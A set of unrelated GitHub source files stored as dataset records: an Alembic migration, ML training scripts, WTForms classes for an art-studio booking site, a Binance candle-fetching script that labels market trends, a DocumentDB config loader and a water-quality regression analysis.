{"seq_id":"41625803347","text":"\"\"\"add crocc course table\n\nRevision ID: a44c41d47965\nRevises: cf7a72c4d543\nCreate Date: 2023-07-13 17:49:56.503392\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a44c41d47965'\ndown_revision = 'cf7a72c4d543'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('cross_course',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('name', sa.String(length=40), nullable=False),\n    sa.Column('course', sa.Float(), nullable=False),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('name')\n    )\n    op.create_unique_constraint(None, 'currency', ['iso'])\n    # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_constraint(None, 'currency', type_='unique')\n    op.drop_table('cross_course')\n    # ### end Alembic commands ###\n","repo_name":"kadr/cross_course","sub_path":"migrations/versions/a44c41d47965_add_crocc_course_table.py","file_name":"a44c41d47965_add_crocc_course_table.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
{"seq_id":"6938629942","text":"import tensorflow as tf\r\nfrom tensorflow.keras.datasets import mnist\r\n\r\n# Load the MNIST data\r\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\r\n\r\n# Normalize the data\r\nx_train = x_train / 255.0\r\nx_test = x_test / 255.0\r\n\r\n# Create the model\r\nmodel = tf.keras.models.Sequential([\r\n    tf.keras.layers.Flatten(input_shape=(28, 28)),\r\n    tf.keras.layers.Dense(10, activation='softmax')\r\n])\r\n\r\n# Compile the model\r\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\r\n\r\n# Train the model\r\nmodel.fit(x_train, y_train, epochs=5, validation_data=(x_test, y_test))\r\n\r\n# Evaluate the model on the test set\r\ntest_loss, test_acc = model.evaluate(x_test, y_test)\r\nprint('Test accuracy:', test_acc)","repo_name":"repalova/labs_AISystems","sub_path":"2/numerals.py","file_name":"numerals.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
{"seq_id":"39985158892","text":"__author__ = 'Ronny Restrepo'\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# ==============================================================================\n#                                                             TALLY_AND_PLOT\n# ==============================================================================\ndef tally_and_plot(a, labels=None, prop=False,\n                   title=\"\", xlabel=\"\", ylabel=\"\",\n                   color=\"#04BAE3\", alpha=0.9):\n    \"\"\"\n    takes a 1-Dimensional array-like object, and plots a bar graph of the\n    tallies of the values in that array.\n\n    You can specify if you want the tally counts, or if you want the proportions\n    of each value (using the `prop` argument)\n\n    :param a: {1D array}\n    :param labels: {None or dictionary}{default=None}\n        A dictionary that maps values to desired label names.\n        eg:\n            labels = {1: \"basketball\",\n                      2: \"soccer\",\n                      4: \"karate\"}\n\n        This is used for the labels that appear in the x axis of the plot.\n\n        If None (default), then it just uses the unique values from `a`\n\n    :param prop: {boolean} {default = False}\n        If True, then it plots the proportions of each value, instead of tally\n        counts\n\n    :param title: {string}{default=\"\"}\n    :param xlabel: {string}{default=\"\"}\n    :param ylabel: {string}{default=\"\"}\n    :param color: {string}{default=\"#04BAE3\"}\n    :param alpha: {float between 0 and 1}{default=0.9}\n\n    :example:\n        a = np.array([4, 2, 2, 1, 2, 2, 4])\n        tally_and_plot(a, labels={1: \"basketball\", 2: \"soccer\", 4: \"karate\"},\n                       prop=True, xlabel=\"Sport\", ylabel=\"Proportion of people\",\n                       title=\"Proportion of people playing each sport\"\n                       )\n    \"\"\"\n    # ==========================================================================\n    tally = np.array(np.unique(a, return_counts=True)).astype(float)\n\n    # Replace tally counts with proportions of values if `prop` is set to True\n    if prop:\n        tally[1] = tally[1] / float(tally[1].sum())\n\n    # Populate default values for labels if none provided\n    if labels is None:\n        labels = tally[0]\n    else:\n        labels = [labels[val] for val in tally[0]]\n\n    plt.figure()\n    
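# one bar per tallied value; the tick positions are shifted by 0.5 further down so labels sit under the bar centers\n    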
plt.bar(range(len(tally[0])), tally[1],\n width=1, color=color, alpha=alpha)\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.axes().set_xticks(np.arange(len(labels)) + 0.5)\n plt.axes().set_xticklabels(labels)\n plt.minorticks_on()\n plt.grid(b=True, which='major', axis=\"y\", color='#666666', linestyle='-',\n alpha=0.9)\n plt.grid(b=True, which='minor', axis=\"y\", color='#999999', linestyle='-',\n alpha=0.6)\n plt.show()\n\n\n\n","repo_name":"ronrest/convenience_py","sub_path":"plot/tally_and_plot.py","file_name":"tally_and_plot.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"22539379025","text":"import pandas as pd\nimport numpy as np\nimport GPy\nfrom IPython.display import display\nfrom optimizer import RProp\n\ndef read_data(datasheet):\n x = pd.read_csv(datasheet+'.csv')\n a = x.values\n inputs = a[:, :-1]\n output = a[:, -1]\n output = output.reshape(-1, 1)\n return inputs, output\n\n\ndef RMSE(Y1, Y2):\n if Y1.shape == Y2.shape:\n return np.sqrt(np.sum((Y1-Y2)**2)/np.size(Y1))\n else:\n print('Shape Y1 ', Y1.shape, ' is different from shape Y2 ', Y2.shape)\n\n\ndef MAE(Y1, Y2):\n if Y1.shape == Y2.shape:\n return np.sum(np.abs(Y1-Y2))/np.size(Y1)\n else:\n print('Shape Y1 ', Y1.shape, ' is different from shape Y2 ', Y2.shape)\n\n\ndef test_model(Xr, Yr, n, Xt, Yt, m):\n kernel = GPy.kern.RBF(input_dim=Xr.shape[1], ARD=True)\n m_random = GPy.models.GPRegression(Xr[:n], Yr[:n], kernel, normalizer=True)\n m_random.rbf.lengthscale = [1, 1, 1, 60, 15000, 10, 3, 500] # [1, 1, 1, 1, 1, 1, 1, 100] # [1, 1, 1, 60, 15000, 10, 3, 500]\n m_random.optimize(RProp(max_iters=500), messages=True)\n m_random.optimize(messages=True)\n display(m_random)\n print(m_random.rbf.lengthscale)\n Yp_random = m_random.predict(Xr[:n])[0]\n Ytest_random = m_random.predict(Xt[:m])[0]\n print('training loss = ', RMSE(Yr[:n], Yp_random))\n print('test loss = ', RMSE(Yt[:m], Ytest_random))\n print('test MAE = ', MAE(Yt[:m], Ytest_random))\n unc = np.mean(np.sqrt(m_random.predict(Xr[:n])[1]))\n print('average uncertainty = ', unc)\n return m_random, kernel\n","repo_name":"yureel/GandALF","sub_path":"tools/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"7457294159","text":"from wtforms import Form, DateTimeField, StringField, SubmitField, HiddenField, RadioField, BooleanField, TextAreaField, FileField, validators\nfrom wtforms.validators import InputRequired, DataRequired, ValidationError, url\nfrom datetime import datetime\n\n# https://wtforms.readthedocs.io/en/stable/fields.html\n\nclass EventsForm(Form):\n eid = HiddenField(\"eid\", description=\"eid\")\n edatetime = DateTimeField(\"Date\", description=\"Date\", format=\"%Y-%m-%d %H:%M:%S\")\n title = StringField(\"Title\", description=\"Title\")\n duration = StringField(\"Duration\", description=\"Duration\")\n price = StringField(\"Price\", description=\"Price\")\n elimit = StringField(\"Limit\", description=\"Limit\")\n location = StringField(\"Location\", description=\"Location\", default=\"400 E. Division St. 
Ste 100 Arlington, TX 76011\")\n image = HiddenField(\"Image Path\", description=\"Image Path\")\n description = TextAreaField(\"Description\", description=\"Description\")\n price_text = StringField(\"Variable\", description=\"Variable time or price\")\n # (time) Feb 6 3-5pm, Feb 6 6-8pm, Feb 7 1-3pm, Feb 7 4-6pm, test\n # (price) one red @ $10, two blue @ $5, a bird @ $20\n tags = StringField(\"Tags\", description=\"Tags: home, cart, fluid-art, alcohol-ink OR invisible\")\n extra_data = HiddenField(\"\", description=\"\")\n submit = SubmitField(\"Next\", description=\"Next\")\n #abc = StringField('abc', [InputRequired()], render_kw={\"placeholder\": \"test\"})\n\nclass ImageForm(Form):\n related_id = HiddenField(\"related_id\", description=\"related_id\")\n image = FileField(\"Upload File\")\n submit = SubmitField(\"Submit\", description=\"Submit\")\n\nclass RegistrationForm(Form):\n rid = HiddenField(\"rid\", description=\"rid\")\n order_id = HiddenField(\"Order ID\", description=\"Order ID\")\n camper1_name = StringField(\"Camper Name\", description=\"Camper Name\")\n camper1_age = StringField(\"Camper Age\", description=\"Camper Age\")\n camper1_grade = StringField(\"Camper Grade\", description=\"Camper Grade\")\n camper2_name = StringField(\"Camper 2 Name\", description=\"Camper 2 Name\")\n camper2_age = StringField(\"Camper 2 Age\", description=\"Camper 2 Age\")\n camper2_grade = StringField(\"Camper 2 Grade\", description=\"Camper 2 Grade\")\n camper3_name = StringField(\"Camper 3 Name\", description=\"Camper 3 Name\")\n camper3_age = StringField(\"Camper 3 Age\", description=\"Camper 3 Age\")\n camper3_grade = StringField(\"Camper 3 Grade\", description=\"Camper 3 Grade\")\n parent_name = StringField(\"Name\", description=\"Name\")\n parent_address = StringField(\"Address\", description=\"Address\")\n parent_city = StringField(\"City\", description=\"City\")\n parent_state = StringField(\"State\", description=\"State\")\n parent_zip = StringField(\"Zip Code\", description=\"Zip Code\")\n parent_email = StringField(\"Email\", description=\"Email\")\n parent_phone = StringField(\"Phone\", description=\"Phone\")\n parent_em_name = StringField(\"Emergency Contact Person\", description=\"Emergency Contact Person\")\n parent_em_phone = StringField(\"Emergency Phone\", description=\"Emergency Phone\")\n pickup1_name = StringField(\"Name\", description=\"Name\")\n pickup1_phone = StringField(\"Phone\", description=\"Phone\")\n pickup2_name = StringField(\"Name 2\", description=\"Name 2\")\n pickup2_phone = StringField(\"Phone 2\", description=\"Phone 2\")\n session1 = BooleanField(\"Week 1: June 22 - 26, 2020\", description=\"session 1\")\n session2 = BooleanField(\"Week 2: July 13 - 17, 2020\", description=\"session 2\")\n treatment_permission = BooleanField(\"Emergency Treatment Permission\", description=\"\")\n photo_release = BooleanField(\"Photo/Social Media Release\", description=\"\")\n signature = StringField(\"Signature\", description=\"\")\n submit = SubmitField(\"Submit\", description=\"Submit\")\n\n\nclass ProductsForm(Form):\n pid = HiddenField(\"pid\", description=\"\")\n name = StringField(\"Name\", description=\"\")\n description = TextAreaField(\"Description\", description=\"\")\n image_path_array = HiddenField(\"Image Path Array\", description=\"Add one or multiple images\")\n inventory = StringField(\"Inventory\", description=\"How many items remaining in stock. 
This value will change automatically as people buy\")\n price = StringField(\"Price\", description=\"Product price before discounts. This can be overridden\")\n keywords_array = StringField(\"Keywords Array\", description=\"Comma-separated list of descriptive one-word keywords\")\n active = StringField(\"Active\", description=\"\")\n submit = SubmitField(\"Next\", description=\"Next\")\n\n\nclass BookingForm(Form):\n id = HiddenField(\"id\", description=\"id\")\n order_id = HiddenField(\"order_id\", description=\"order_id\")\n eid = HiddenField(\"eid\", description=\"event_id\")\n create_time = HiddenField(\"create_time\", description=\"create_time\")\n email = StringField(\"email\", description=\"email\")\n first_name = StringField(\"first_name\", description=\"first_name\")\n last_name = StringField(\"last_name\", description=\"last_name\")\n quantity = StringField(\"quantity\", description=\"Total number of guests in this order\")\n cost = StringField(\"cost\", description=\"optional field\")\n paid = StringField(\"paid\", description=\"optional field\")\n guest_list = StringField(\"guest_list\", description=\"Guest list optional\")\n variable_time = StringField(\"variable_time\", description=\"Variable time optional\")\n extra_data = StringField(\"extra_data\", description=\"Extra data optional\")\n transaction_id = StringField(\"transation_id\", description=\"transaction id\")\n buyer_name = StringField(\"buyer_name\", description=\"Buyer name optional\")\n buyer_phone = StringField(\"buyer_phone\", description=\"Buyer phone optional\")\n submit = SubmitField(\"Next\", description=\"Next\")\n\n","repo_name":"mmarum/cca","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25597266179","text":"import pandas as pd\r\nimport numpy as np\r\nimport torch\r\nimport pickle\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom error import BinanceMaxCandlesError, BeforeOperationError, NotEnoughCandlesError, NotEnoughCandlesFromBinanceError\r\nimport cryptocurrencies_setup\r\nimport binance_client_setup\r\nfrom utils import flush\r\n\r\n# when we want to retrieve a finite number of candles from Binance API, let's say N,\r\n# we are restricted to:\r\n# - the datetime we want to start getting data\r\n# - the candle size, for instance, 15m, 1h, 4h, and so on\r\n# then we need to use a base unit (this case minutes) to predict if the combination of arguments\r\n# allow us to retrieve N candles considering the starting datetime and candle sizes\r\n# so, this variable help us to cast every candle size into minutes,\r\n# this way, if we want to get 10 candles of \"1h\" size\r\n# we know that \"1h\" is equivalent to 60 minutes, and then,\r\n# we will require 10 * 60 = 600 minutes minimum\r\n# and the starting datetime should be, at least,\r\n# 600 minutes backwards of the moment we made the request\r\nconverter = {\"15m\": 1/4 * 60, \"1h\": 1 * 60, \"4h\": 4 * 60}\r\n\r\n\r\ndef get_candles(symbol: str, start: pd.Timestamp, candles_amount: int, candles_size: str):\r\n \"\"\"\r\n Retrieves candles of a cryptocurrency pair from Binance API\r\n\r\n Parameters\r\n ----------\r\n symbol: str\r\n The cryptocurrency pair to retrieve\r\n start: pandas.Timestamp\r\n The datetime to start retrieving candles\r\n candles_amount: int\r\n Amount of candles to retrieve\r\n candles_size: str\r\n The size of the candles to retrieve, either, 15m, 30m, and so on.\r\n\r\n 

def get_candles(symbol: str, start: pd.Timestamp, candles_amount: int, candles_size: str):
    """
    Retrieves candles of a cryptocurrency pair from Binance API

    Parameters
    ----------
    symbol: str
        The cryptocurrency pair to retrieve
    start: pandas.Timestamp
        The datetime to start retrieving candles
    candles_amount: int
        Amount of candles to retrieve
    candles_size: str
        The size of the candles to retrieve, e.g. 15m, 30m, and so on.

    Raises
    ------
    error.BeforeOperationError
        If the starting datetime to request candles is before the existence of the cryptocurrency pair
    error.NotEnoughCandlesError
        If the combination of starting datetime and candle size doesn't allow retrieving the indicated number of candles
    error.NotEnoughCandlesFromBinanceError
        If the candles retrieved from the Binance API are fewer than expected (even with the right arguments)
    """
    # if candles_amount > BinanceMaxCandlesError.max_candles_to_retrieve:
    #     raise BinanceMaxCandlesError(candles_amount)

    today = pd.Timestamp.today()
    symbol_beginning = cryptocurrencies_setup.beginnings[symbol]

    if start < symbol_beginning:
        raise BeforeOperationError(
            symbol=symbol, beginning=symbol_beginning, start=start)

    elapsed = (today - start)
    candles = int(
        np.floor(elapsed / pd.Timedelta(converter[candles_size], "m")))

    if candles < candles_amount:
        raise NotEnoughCandlesError(
            symbol=symbol, candles_size=candles_size, start=start)

    candles_left = candles_amount
    bars = np.empty((0, 12), float)

    while candles_left:
        candles_to_retrieve = candles_left

        if candles_left > BinanceMaxCandlesError.max_candles_to_retrieve:
            candles_to_retrieve = BinanceMaxCandlesError.max_candles_to_retrieve

        # Binance's kline endpoint takes startTime in milliseconds
        retrieved_bars = binance_client_setup.client.get_klines(
            symbol=symbol, interval=candles_size, startTime=int(start.timestamp() * 1000), limit=candles_to_retrieve)
        bars = np.append(bars, retrieved_bars, axis=0)
        candles_left -= candles_to_retrieve

        if not retrieved_bars:
            break

        # advance the window past the last batch (kline field 6 is the close
        # time in milliseconds), so the next request doesn't re-fetch the
        # same candles
        start = pd.Timestamp(int(retrieved_bars[-1][6]) + 1, unit="ms")

    if len(bars) < candles_amount:
        raise NotEnoughCandlesFromBinanceError(
            candles_size=candles_size, symbol=symbol)

    return bars.tolist()


def trending(closings: np.array):
    """
    Recognizes the trend of a cryptocurrency pair market

    Parameters
    ----------
    closings: numpy.array
        1D array of closing prices, ordered in time
    """

    # because we don't have the independent variable
    # (we only have the outputs, which are the closings)
    # we must make it
    # this way, x=0 maps to y=closings[0]
    # then x=1 maps to y=closings[1], and so on
    timestamps = np.arange(closings.shape[0]).reshape(-1, 1)
    regression = LinearRegression().fit(timestamps, closings)

    # once the regression is done, we standardize the slope
    # this way, values will be independent of output magnitudes
    slope = regression.coef_[0]
    timestamps_standard_deviation = np.std(timestamps)
    closings_standard_deviation = np.std(closings)
    standarized_slope = slope * timestamps_standard_deviation / \
        closings_standard_deviation

    # upward trend when standarized_slope >= 0.5 returns 1
    # downward trend when standarized_slope <= -0.5 returns -1
    # neither upward nor downward trend returns 0
    return 1 * (standarized_slope >= 0.5) + -1 * (standarized_slope <= -0.5), regression
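
# Illustrative sanity check (a sketch, not in the original module; the helper
# name is hypothetical): a clean linear ramp standardizes to slope 1.0, hence
# an uptrend, while a tiny oscillation around a constant level standardizes
# close to 0, hence no trend.
def _trending_demo():
    up, _ = trending(np.linspace(100.0, 110.0, 64))
    flat, _ = trending(100.0 + 0.01 * np.sin(np.arange(64)))
    return up, flat  # expected: (1, 0)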

def get_exercises(exercises_amount: int, candles_amount: int = 512, candles_size: str = "15m"):
    """
    Generates exercises retrieving candles from Binance API to predict the trend
    """

    # gets all available symbols from Binance
    symbols = list(cryptocurrencies_setup.beginnings.keys())
    x_training = []
    y_training = []

    exercises_created = 0

    while exercises_created < exercises_amount:
        # choose a random symbol to work on
        random_index = torch.randint(
            low=0, high=len(symbols), size=(1,))[0].item()
        symbol = symbols[random_index]

        # if we want to get 200 candles of 15m starting from today, we couldn't
        # because we can't get data that doesn't exist in Binance yet
        # this way, we must request the candles, at least, 200 * 15 minutes = 3000 minutes before today
        # now, we could request candles from the beginning of the cryptocurrency until today minus 3000 minutes
        # in general, the range would be [today, today - candles to retrieve * candle_frame]
        # in this case, we use minutes as the basic unit of time
        # that's the reason why we use a converter because if we have a candle frame like 1h
        # it will be converted as 60 (minutes).
        today = pd.Timestamp.today()
        limit_datetime = today - \
            pd.DateOffset(minutes=converter[candles_size]*candles_amount)
        minutes_range = np.ceil(pd.Timedelta(
            limit_datetime - cryptocurrencies_setup.beginnings[symbol]).total_seconds() / 60).astype(int)

        # minutes range could be negative
        # it means that the cryptocurrency is too new
        # then, there is not enough data to retrieve
        if minutes_range < 0:
            continue

        # we choose a random minute between [0, minutes_range]
        # this will add up minutes from the beginning of operations of the cryptocurrency
        # this way, we will choose random dates depending on how many minutes we want to be away from the beginning
        random_minutes = torch.randint(
            low=0, high=minutes_range, size=(1,))[0].item()
        start = cryptocurrencies_setup.beginnings[symbol] + \
            pd.DateOffset(minutes=random_minutes)

        # request candles from Binance
        try:
            # progress bar
            percentage = int(round((exercises_created+1) /
                             exercises_amount * 100, 0))
            print("{step: >5}/{steps: <5} [{percentage}%] making exercise with {symbol}".format(
                step=exercises_created+1, steps=exercises_amount, percentage=percentage, symbol=symbol), end="")

            # retrieved bars from Binance API
            bars = get_candles(symbol=symbol, start=start,
                               candles_amount=candles_amount, candles_size=candles_size)
            bars = np.array(bars).astype(float)
            closings = bars[:, 4]

            # consider the following indexes
            # bars[i][1] = open
            # bars[i][2] = high
            # bars[i][3] = low
            # bars[i][4] = close
            # bars[i][5] = volume
            # the slice below keeps columns 0..5, so after flattening:
            # x_training[i][j][0] = open time
            # x_training[i][j][1] = open
            # x_training[i][j][2] = high
            # x_training[i][j][3] = low
            # x_training[i][j][4] = close
            # x_training[i][j][5] = volume
            trend, _ = trending(closings)
            x_training.append(bars[:,:6])
            y_training.append(trend)

            # clear the output to print on the same line
            # otherwise (reaching the end) it prints a new line
            flush(exercises_created, exercises_amount)

            # increase the amount of exercises created
            exercises_created += 1

        except NotEnoughCandlesFromBinanceError:
            print(
                f"[ERROR] candle size: {candles_size} candles_amount: {candles_amount} symbol: {symbol} start: {start}")

    return x_training, y_training


def build_exercises(exercises_amount, candles_amount):
    # gets training data
    x_training, y_training = get_exercises(
        exercises_amount=exercises_amount, candles_amount=candles_amount)

    # persist data into pickles
    with open("training/x_training.pickle", "wb") as f:
        pickle.dump(x_training, f)
    with open("training/y_training.pickle", "wb") as f:
pickle.dump(y_training, f)\r\n","repo_name":"cooperaty/ai-trainer","sub_path":"exercises_builder.py","file_name":"exercises_builder.py","file_ext":"py","file_size_in_byte":9367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"26128718655","text":"from dataclasses import dataclass\nfrom pathlib import Path\nimport ruamel.yaml\nfrom typing import List\nfrom typing import Union\n\n\n@dataclass(frozen=True)\nclass DocumentDBConfig:\n \"\"\"\n Configuration for a DocumentDB cluster.\n\n Includes internal fields used for configuration.\n \"\"\"\n\n admin_user: str\n admin_password: str\n endpoint: str\n hosts: List[str]\n port: int\n\n @staticmethod\n def load(config_path: Union[Path, str]):\n config_path = Path(config_path)\n\n with open(config_path) as config_file:\n yaml = ruamel.yaml.YAML(typ=\"safe\", pure=True)\n config_dict = yaml.load(config_file)\n\n return DocumentDBConfig.parse(config_dict)\n\n @staticmethod\n def parse(config_dict: dict):\n return DocumentDBConfig(\n admin_user=config_dict[\"admin_user\"],\n admin_password=config_dict[\"admin_password\"],\n endpoint=config_dict[\"endpoint\"],\n hosts=config_dict[\"hosts\"],\n port=config_dict[\"port\"],\n )\n\n\n@dataclass(frozen=True)\nclass DocumentDBClientConfig:\n \"\"\"\n Configuration for a DocumentDB cluster.\n\n Excludes internal fields that a client should not access.\n \"\"\"\n\n endpoint: str\n hosts: List[str]\n port: int\n\n @staticmethod\n def load(config_path: Union[Path, str]):\n config_path = Path(config_path)\n\n with open(config_path) as config_file:\n yaml = ruamel.yaml.YAML(typ=\"safe\", pure=True)\n config_dict = yaml.load(config_file)\n\n return DocumentDBClientConfig.parse(config_dict)\n\n @staticmethod\n def parse(config_dict: dict):\n return DocumentDBClientConfig(\n endpoint=config_dict[\"endpoint\"],\n hosts=config_dict[\"hosts\"],\n port=config_dict[\"port\"],\n )\n","repo_name":"uwscope/scope-web","sub_path":"scope_shared/scope/config/documentdb.py","file_name":"documentdb.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3430748982","text":"\r\nimport os\r\nos.chdir(r'C:\\Users\\ASUS-PC\\Documents\\Python op')\r\n\r\nimport numpy as np \r\nimport pandas as pd\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\ndata=pd.read_csv('water_data.csv',encoding=\"ISO-8859-1\")\r\ndata.fillna(0, inplace=True)\r\ndata.head()\r\n\r\ndata['Temp']=pd.to_numeric(data['Temp'],errors='coerce')\r\ndata['D.O. (mg/l)']=pd.to_numeric(data['D.O. (mg/l)'],errors='coerce')\r\ndata['PH']=pd.to_numeric(data['PH'],errors='coerce')\r\ndata['B.O.D. (mg/l)']=pd.to_numeric(data['B.O.D. 
(mg/l)'],errors='coerce')\r\ndata['CONDUCTIVITY (µmhos/cm)']=pd.to_numeric(data['CONDUCTIVITY (µmhos/cm)'],errors='coerce')\r\ndata['NITRATENAN N+ NITRITENANN (mg/l)']=pd.to_numeric(data['NITRATENAN N+ NITRITENANN (mg/l)'],errors='coerce')\r\ndata['TOTAL COLIFORM (MPN/100ml)Mean']=pd.to_numeric(data['TOTAL COLIFORM (MPN/100ml)Mean'],errors='coerce')\r\n\r\n\r\nstart=2\r\nend=1992\r\nstation=data.iloc [start:end ,0]\r\nlocation=data.iloc [start:end ,1]\r\nstate=data.iloc [start:end ,2]\r\ndo= data.iloc [start:end ,4].astype(np.float64)\r\nvalue=0\r\nph = data.iloc[ start:end,5] \r\nco = data.iloc [start:end ,6].astype(np.float64) \r\nyear=data.iloc[start:end,11]\r\ntc=data.iloc [2:end ,10].astype(np.float64)\r\nbod = data.iloc [start:end ,7].astype(np.float64)\r\nna= data.iloc [start:end ,8].astype(np.float64)\r\nna.dtype\r\n\r\ndata.head()\r\n\r\ndata=pd.concat([station,location,state,do,ph,co,bod,na,tc,year],axis=1)\r\ndata. columns = ['station','location','state','do','ph','co','bod','na','tc','year']\r\n\r\ndata['npH']=data.ph.apply(lambda x: (100 if (8.5>=x>=7) \r\n else(80 if (8.6>=x>=8.5) or (6.9>=x>=6.8) \r\n else(60 if (8.8>=x>=8.6) or (6.8>=x>=6.7) \r\n else(40 if (9>=x>=8.8) or (6.7>=x>=6.5)\r\n else 0)))))\r\n\r\ndata['ndo']=data.do.apply(lambda x:(100 if (x>=6) \r\n else(80 if (6>=x>=5.1) \r\n else(60 if (5>=x>=4.1)\r\n else(40 if (4>=x>=3) \r\n else 0)))))\r\n\r\ndata['nco']=data.tc.apply(lambda x:(100 if (5>=x>=0) \r\n else(80 if (50>=x>=5) \r\n else(60 if (500>=x>=50)\r\n else(40 if (10000>=x>=500) \r\n else 0)))))\r\n\r\ndata['nbdo']=data.bod.apply(lambda x:(100 if (3>=x>=0) \r\n else(80 if (6>=x>=3) \r\n else(60 if (80>=x>=6)\r\n else(40 if (125>=x>=80) \r\n else 0)))))\r\n\r\ndata['nec']=data.co.apply(lambda x:(100 if (75>=x>=0) \r\n else(80 if (150>=x>=75) \r\n else(60 if (225>=x>=150)\r\n else(40 if (300>=x>=225) \r\n else 0)))))\r\n\r\ndata['nna']=data.na.apply(lambda x:(100 if (20>=x>=0) \r\n else(80 if (50>=x>=20) \r\n else(60 if (100>=x>=50)\r\n else(40 if (200>=x>=100) \r\n else 0)))))\r\n\r\ndata.head()\r\ndata.dtypes\r\n\r\ndata['wph']=data.npH * 0.165\r\ndata['wdo']=data.ndo * 0.281\r\ndata['wbdo']=data.nbdo * 0.234\r\ndata['wec']=data.nec* 0.009\r\ndata['wna']=data.nna * 0.028\r\ndata['wco']=data.nco * 0.281\r\ndata['wqi']=data.wph+data.wdo+data.wbdo+data.wec+data.wna+data.wco \r\ndata\r\n\r\nag=data.groupby('year')['wqi'].mean()\r\n\r\nag.head()\r\n\r\ndata=ag.reset_index(level=0,inplace=False)\r\ndata\r\n\r\nyear=data['year'].values\r\nAQI=data['wqi'].values\r\ndata['wqi']=pd.to_numeric(data['wqi'],errors='coerce')\r\ndata['year']=pd.to_numeric(data['year'],errors='coerce')\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.rcParams['figure.figsize'] = (20.0, 10.0)\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfig = plt.figure()\r\nax = Axes3D(fig)\r\nax.scatter(year,AQI, color='red')\r\nplt.show()\r\ndata\r\n\r\ndata = data[np.isfinite(data['wqi'])]\r\ndata.head()\r\n\r\ncols =['year']\r\ny = data['wqi']\r\nx=data[cols]\r\n\r\nplt.scatter(x,y)\r\nplt.show()\r\n\r\nimport matplotlib.pyplot as plt\r\ndata=data.set_index('year')\r\ndata.plot(figsize=(15,6))\r\nplt.show()\r\n\r\nfrom sklearn import neighbors,datasets\r\ndata=data.reset_index(level=0,inplace=False)\r\ndata\r\n\r\nfrom sklearn import linear_model\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ncols =['year']\r\n\r\ny = 
data['wqi']
x=data[cols]
reg=linear_model.LinearRegression()
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2,random_state=0)
reg.fit(x_train,y_train)
a=reg.predict(x_test)
a  # notebook-style bare expression; it only displays in an interactive session

y_test

from sklearn.metrics import mean_squared_error
print('mse: %.2f' % mean_squared_error(y_test, a))

dt = pd.DataFrame({'Actual': y_test, 'Predicted': a})

x = (x - x.mean()) / x.std()
x = np.c_[np.ones(x.shape[0]), x]
x

alpha = 0.1  # Step size
iterations = 3000  # No. of iterations
m = y.size  # No. of data points
np.random.seed(4)  # Setting the seed
theta = np.random.rand(2)  # Picking some random values to start with

def gradient_descent(x, y, theta, iterations, alpha):
    past_costs = []
    past_thetas = [theta]
    for i in range(iterations):
        prediction = np.dot(x, theta)
        error = prediction - y
        cost = 1/(2*m) * np.dot(error.T, error)
        past_costs.append(cost)
        theta = theta - (alpha * (1/m) * np.dot(x.T, error))
        past_thetas.append(theta)

    return past_thetas, past_costs

past_thetas, past_costs = gradient_descent(x, y, theta, iterations, alpha)
theta = past_thetas[-1]

# Print the results...
print("Gradient Descent: {:.2f}, {:.2f}".format(theta[0], theta[1]))

plt.title('Cost Function J')
plt.xlabel('No. of iterations')
plt.ylabel('Cost')
plt.plot(past_costs)
plt.show()
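
# Illustrative cross-check (a sketch, not in the original script): the
# closed-form least-squares solution should land near the gradient-descent
# theta above, since both minimize the same cost on the same design matrix x.
theta_closed_form, *_ = np.linalg.lstsq(x, y, rcond=None)
print("Closed form: {:.2f}, {:.2f}".format(theta_closed_form[0], theta_closed_form[1]))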

import numpy as np
newB=[74.92, 4.24]

def rmse(y, y_pred):
    # RMSE: square root of the mean of the squared residuals
    rmse = np.sqrt(np.mean((y - y_pred) ** 2))
    return rmse


y_pred=x.dot(newB)

dt = pd.DataFrame({'Actual': y, 'Predicted': y_pred})
dt=pd.concat([data, dt], axis=1)
dt

from sklearn import metrics
print(np.sqrt(metrics.mean_squared_error(y,y_pred)))

x_axis=dt.year
y_axis=dt.Actual
y1_axis=dt.Predicted
plt.scatter(x_axis,y_axis)
plt.plot(x_axis,y1_axis,color='r')
plt.title("linear regression")

plt.show()

from sklearn.linear_model import LinearRegression
from sklearn.metrics import confusion_matrix,r2_score,mean_gamma_deviance,explained_variance_score,max_error

print(" ")
print("Linear Regression:")
print("R2 Score:",r2_score(y,y_pred))
print("Root Mean Square:",np.sqrt(mean_squared_error(y,y_pred)))
print("Explained Variance Score:",explained_variance_score(y,y_pred))
print("Max Error:",max_error(y,y_pred))
print("Mean Gamma Deviance:",mean_gamma_deviance(y,y_pred))
print("---------------------------------------------------------------------")
print(" ")


from sklearn.preprocessing import PolynomialFeatures
poly_reg = PolynomialFeatures(degree=4)
X_poly = poly_reg.fit_transform(x_train)
